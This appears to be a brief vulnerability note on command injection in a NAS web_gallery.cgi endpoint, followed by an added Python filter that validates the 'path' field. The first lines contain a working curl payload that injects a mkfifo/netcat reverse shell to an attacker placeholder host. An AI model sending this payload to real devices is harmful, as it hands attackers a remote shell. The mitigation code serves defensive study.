Nas523

curl -X POST "http://<TARGET_IP>/api/web_gallery" \
  -d "path=/var/log;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> 4444 >/tmp/f"

The vulnerability resides within the web_gallery.cgi binary located on the device's file system. This CGI script is responsible for handling requests related to the photo gallery feature.
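A validation check for the path field that the request above abuses, written as an added example; it is not code from the original page or from the device vendor. GALLERY_ROOT, the character allowlist and the function name are assumptions chosen for illustration, and a filter like this in a reverse proxy is a compensating control in front of the device, not a fix to web_gallery.cgi itself.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Assumption: the gallery only needs directories under this root (hypothetical value).
GALLERY_ROOT = "/share/photos"

# Allowlist rather than denylist: anything outside these characters is rejected,
# which covers ; | & > $ ` quotes, whitespace and control characters in one rule.
# Assumption: gallery folder names do not need spaces or non-ASCII characters.
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")


def check_gallery_path(form_body: str) -> list[str]:
    """Return reasons to reject a POST body for /api/web_gallery (empty list = accept)."""
    # parse_qs percent-decodes, so encoded metacharacters (%3B, %7C, ...) are
    # inspected in the same form the CGI would see them.
    params = parse_qs(form_body, keep_blank_values=True)
    values = params.get("path", [])
    if len(values) != 1:
        # Duplicate parameters invite the filter and the CGI to disagree on
        # which value counts, so they are refused outright.
        return ["expected exactly one 'path' parameter"]
    path = values[0]
    reasons = []
    if not SAFE_PATH.fullmatch(path):
        reasons.append("character outside allowlist in path")
    # Resolve "." and ".." before the prefix test so traversal cannot escape the root.
    normalized = posixpath.normpath(path)
    if normalized != GALLERY_ROOT and not normalized.startswith(GALLERY_ROOT + "/"):
        reasons.append("path outside gallery root")
    return reasons


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "path=/share/photos/2023",        # ordinary gallery folder
    "path=/share/photos/2023%3Bid",   # percent-encoded ';' after a valid prefix
    "path=/share/photos/../../etc",   # traversal out of the root
    "path=/var/log",                  # clean characters, wrong directory
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(f"{body!r}: {check_gallery_path(body) or 'accept'}")
```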